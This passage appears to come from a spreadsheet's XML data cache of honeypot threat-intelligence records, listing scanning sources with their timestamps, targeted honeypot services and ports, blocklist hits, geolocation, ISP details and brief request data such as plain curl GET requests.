    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3768"/>
    <x v="3768"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:32:31"/>
    <d v="2025-03-11T09:30:21"/>
    <d v="2025-04-01T13:32:31"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f5:5e2e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3769"/>
    <x v="3769"/>
    <s v="114-33-107-229.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:22:41"/>
    <d v="2024-04-11T17:05:00"/>
    <d v="2025-04-01T13:22:41"/>
    <n v="385"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;32169&amp;&amp;23&amp;&amp;40596&amp;&amp;40692&amp;&amp;9100&amp;&amp;19377"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:6be5"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3770"/>
    <x v="3770"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:15:16"/>
    <d v="2025-04-01T13:15:16"/>
    <d v="2025-04-01T13:15:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:ad6c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3771"/>
    <x v="3771"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:14:59"/>
    <d v="2023-10-12T22:15:00"/>
    <d v="2025-04-01T13:14:59"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;14189&amp;&amp;21&amp;&amp;62792&amp;&amp;22&amp;&amp;64194&amp;&amp;23&amp;&amp;41485&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7219"/>
    <s v="51.3347"/>
    <s v="31549"/>
    <s v="Aria Shatel PJSC"/>
    <s v="Aria Shatel PJSC"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5eb7:4a5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3772"/>
    <x v="3772"/>
    <s v="114-33-69-141.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:08:57"/>
    <d v="2024-09-11T09:12:00"/>
    <d v="2025-04-01T13:08:57"/>
    <n v="473"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;25930&amp;&amp;29705&amp;&amp;23&amp;&amp;9100"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7221:458d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3773"/>
    <x v="3773"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:06:36"/>
    <d v="2025-04-01T13:03:46"/>
    <d v="2025-04-01T13:06:36"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South East"/>
    <s v="Defence Colony"/>
    <s v="10263259"/>
    <s v="NA"/>
    <s v="28.5714"/>
    <s v="77.2327"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="Abts Delhi"/>
    <s v="2006-12-19"/>
    <s v="ABTS-DSl-DEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa2:9050"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3774"/>
    <x v="3774"/>
    <s v="220-132-127-146.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:03:03"/>
    <d v="2023-08-15T11:05:49"/>
    <d v="2025-04-01T13:03:03"/>
    <n v="516"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;4520&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;30938&amp;&amp;26440"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:7f92"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3775"/>
    <x v="3775"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T13:00:51"/>
    <d v="2023-11-20T20:23:54"/>
    <d v="2025-04-01T13:00:51"/>
    <n v="748"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_SOCKS5_H42&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;389&amp;&amp;631&amp;&amp;80&amp;&amp;443&amp;&amp;5900&amp;&amp;1080&amp;&amp;27367&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-02-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:b706"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3776"/>
    <x v="3776"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:59:51"/>
    <d v="2025-03-30T02:02:49"/>
    <d v="2025-04-01T12:59:51"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_LDAP_HC1"/>
    <s v="5432&amp;&amp;389&amp;&amp;6667"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RS"/>
    <s v="Serbia"/>
    <s v="NA"/>
    <s v="Central Serbia"/>
    <s v="Belgrade"/>
    <s v="Belgrade"/>
    <s v="792680"/>
    <s v="NA"/>
    <s v="44.804"/>
    <s v="20.4651"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe"/>
    <s v="hosting"/>
    <s v="M247 Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;command"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9859:a062"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3777"/>
    <x v="3777"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:59:38"/>
    <d v="2025-04-01T12:59:38"/>
    <d v="2025-04-01T12:59:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fd:a64d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3778"/>
    <x v="3778"/>
    <s v="220-133-139-17.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T12:34:12"/>
    <d v="2023-08-08T13:24:00"/>
    <d v="2025-04-01T12:34:12"/>
    <n v="596"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;31462&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc85:8b11"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3779"/>
    <x v="3779"/>
    <s v="NA&amp;&amp;220-133-171-22.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T12:28:10"/>
    <d v="2024-09-03T07:55:00"/>
    <d v="2025-04-01T12:28:10"/>
    <n v="1425"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
